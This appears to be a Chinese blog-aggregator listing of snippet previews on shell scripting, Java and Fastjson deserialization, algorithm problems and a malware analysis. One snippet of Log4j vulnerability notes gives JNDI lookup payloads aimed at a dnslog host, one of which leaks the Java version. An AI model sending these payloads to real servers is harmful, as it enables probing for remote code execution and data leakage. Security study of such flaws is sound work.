序列fastjson恶意shell
Java反序列化:CommonsCollections3调试分析
基础知识 1. Java 反射 1.1 getConstructor getConstructor 是Java反射API中的一个方法,用于获取类的公共构造方法的引用。构造方法是一种特殊的方法,用于创建类的实例(对象),并且通常在对象创建时进行初始化。 getConstructor的函数原型: pub ......
hugepages_settings.sh-Shell Script to Calculate Values Recommended Linux HugePages-HugeTLB Configuration_DocID401749.1
Oracle Linux-Shell Script to Calculate Values Recommended Linux HugePages-HugeTLB Configuration_DocID401749.1 ######################################## ......
Go语言中JSON的反序列化规则
Unmarshal 解析 func Unmarshal(data []byte, v any) error Unmarshal 解析 JSON 编码的数据,并将结果存储在 v 指向的值中。如果 v 为 nil 或不是指针,Unmarshal 返回一个 InvalidUnmarshalError 错误 ......
shell 命令自动补全模板
示例1 function _xwjh() { local cur prev opts COMPREPLY=() cur="${COMP_WORDS[COMP_CWORD]}" prev="${COMP_WORDS[COMP_CWORD-1]}" # opts="gen init start dele ......
每日学习之shell操作
进入hbase之前要启动zk hadoop hbase # 启动ZK ./start-zk.sh 我启动zk的路径为:/export/server/zookeeper/bin/zkServer.sh start 三台虚拟机都要启动 # 启动hadoop start-all.sh # 启动hbase ......
实现shell脚本多线程
默认的情况下,Shell脚本中的命令是串行执行,必须等到前一条命令执行完后才执行接下来的命令,但是如果有一大批命令需要执行,而且互相又没有影响的情况下,那么就要使用并发的方式执行命令了。 因为Shell本身并不提供多线程机制,因此需要借助其他技术(如有名管道)来实现多线程的通信。 后台执行实现并发 ......
浅谈最长公共子序列
最长公共子序列 定义 最长公共子序列(LCS)是一个在一个序列集合中(通常为两个序列)用来查找所有序列中最长子序列的问题。 ——维基百科 这里的子序列,是可以不连续的。 比如: 1 2 3 1 2 4 2 3 2 1 5 2 1 2 他们的最长公共子序列就是 2 1 2 2。 也就是从两个序列,分别 ......
pppay.exe恶意代码分析
业界微步和vt沙箱样本分析: https://s.threatbook.com/report/file/376255ae3f745766ad2a3250c933467cdc3cff886b759bc3e1f656ddf4171433 https://www.virustotal.com/gui/fi ......
Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
JNDI注入 什么是JNDI JNDI全称为 Java Naming and Directory Interface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。 JNDI支持的服务主要有:DNS ......
makefile中导入shell脚本中export的环境变量
1.在makefile中,想要直接导入shell脚本的环境变量是有点麻烦,因为source命令导出的变量只在当前终端有效,而且source命令和.命令是等价的,如下: source ./env.sh . ./env 通常我们拿到SDK交叉编译链,都会先解压工具链,在source一下工具链中的环境变量 ......
shell脚本中的变量定义
shell脚本中的变量 局部变量 local 修饰,作用域在函数里,当出现同名变量优先级高于外部全局变量 全局变量 全局变量,不加任何修饰符,一般用于定义常量,任何函数体里都可以直接去取全局变量的值 ......
shell脚本
1.case语句 可以实现switch case的逻辑 case $server_vendor in "HP"|"Hewlett-Packard") install_rpm "HP" hp_server_hardware_health_check ;; *) install_rpm "Other" ......
Hadoop3.3.6 Shell命令操作
一、mkdir 创建文件夹通过命令hadoop fs -mkdir /cyw在hdfs中创建名为cyw的文件夹 二、moveFromLocal从本地剪切到hdfs中 这里将本地/home/input/movefromlocal文件剪切到hdfs的cyw文件夹下hadoop fs -moveFromL ......
剑指 Offer 57 - II. 和为s的连续正数序列
题目链接: 剑指 Offer 57 - II. 和为s的连续正数序列 题目描述: 输入一个正整数 target ,输出所有和为 target 的连续正整数序列(至少含有两个数)。 序列内的数字由小到大排列,不同序列按照首个数字从小到大排列。 解法思路: 双指针: 当总和小于 target 时,j 指 ......
SDOI2015 序列统计
题目链接 description 给定一个质数 \(m\),以及 \(n,x\) 和集合 \(S\)。从集合 \(S\) 中任意选数构成长度为 \(n\) 的数列(一个数可以选多次),求数列元素乘积模 \(m\) 等于 \(x\) 的数列的数量。模 \(1004535809\)。 \(3\leq m ......
[HNOI2016] 序列
[HNOI2016] 序列 题解:\(ST\)表 + 莫队 设莫队维护区间\([l,r]\)的答案\(ans\),我们考虑右端点\(r\)向右扩张时\(r:=r+1\)对\(ans\)的影响,设\(min[l,r]\)代表区间\([l,r]\)中的最小值 \(ans :=ans+min[r,r]+m ......
shell 执行git 拉取代码并运行jar包
#!/bin/shecho “正在获取git最新代码,请输入正确的用户名与密码”output=git pull origin mastera=$?b=0if [ $a = $b ]; thenecho “代码拉取成功,正在执行打包”mvn clean && mvn compile && mvn in ......
Python第四章序列(2):元组
1.创建元组: a=('a',2009) //与列表不同,用圆括号 a=() a=(20,) //当元组中只包含一个元素的时候,需要在元素后加逗号,不然括号会被当成运算符 2.元组访问: a[1] a[2:5] //也可以用切片 也可以用for的遍历。 3.修改元组: 元组不允许修改。修改要通过对元 ......
Python第四章序列(1):列表
1.列表的创建: a=['hallo','guten',[2002,2223]] empty_list=[] 2.获得列表长度: len(a) 3.创建数值列表: a=list(range (1,6)) //1到6的列表 b=list(range(1,11,2)) //1到10的奇数列表 c=lis ......
shell 执行git 拉取代码并运行jar包
#!/bin/shecho “正在获取git最新代码,请输入正确的用户名与密码”output=git pull origin mastera=$?b=0if [ $a = $b ]; thenecho “代码拉取成功,正在执行打包”mvn clean && mvn compile && mvn in ......
R语言武汉流动人口趋势预测:灰色模型GM(1,1)、ARIMA时间序列、logistic逻辑回归模型|附代码数据
全文链接:http://tecdat.cn/?p=32496 原文出处:拓端数据部落公众号 人口流动与迁移,作为人类产生以来就存在的一种社会现象,伴随着人类文明的不断进步从未间断。 人力资源是社会文明进步、人民富裕幸福、国家繁荣昌盛的核心推动力量。当前,我国经济正处于从以政府主导的投资驱动型的经济“ ......
JAVA的几个知名的反序列化漏洞
更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 # Log4j 条件:出网(因为需要请求jndi服务器) ``` ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a. ......
Fastjson_1.2.47_rce
[toc] # Fastjson_1.2.47_rce | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | Fastjson_1.2.47_远程执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 | | ### 1.1、漏洞描述 Fa ......
fastjson_1.2.24_unserializer_rce
[toc] # fastjson 1.2.24 反序列化导致任意命令执行漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | fastjson 1.2.24 反序列化导致任意命令执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 ......
linux -shell 实现base64 和 md5
base64 加密fk=$(echo ${str} | openssl base64) echo ${fk} 解密 jfk=$(echo ${fk} | openssl base64 -d) echo ${jfk} md5 加密,一次盐值fk2=$(echo -n ${str} | md5sum) ......
Linux shell 环境变量 All In One
Linux shell 环境变量 All In One
全局环境变量,system wide environment 系统级环境变量
局部环境变量,local wide environment 用户自定义环境变量
......
P2757 [国家集训队] 等差子序列 和小感悟
`2023-07-19 20:07:13` (双倍经验:CF452F Permutation) ## 前言 这篇题解的代码与大部分代码用的正反做哈希不太一样,是倒数组做哈希的,希望可以给跟我方法相似但是代码挂了的同学一点启发。 ## 自己的想法 由等差数列基本性质,我们只要找到任意三个数满足 $a[ ......
CF 1860 C【最大上升子序列】
## [C. Game on Permutation](https://codeforces.com/contest/1860/problem/C) 这道题需要求出**先手必胜**点 通过分析可知,每个位置结尾的最大上升子序列长度为**2**的点为先手必胜点,**≥3**的点为先手必败点。即只需要求 ......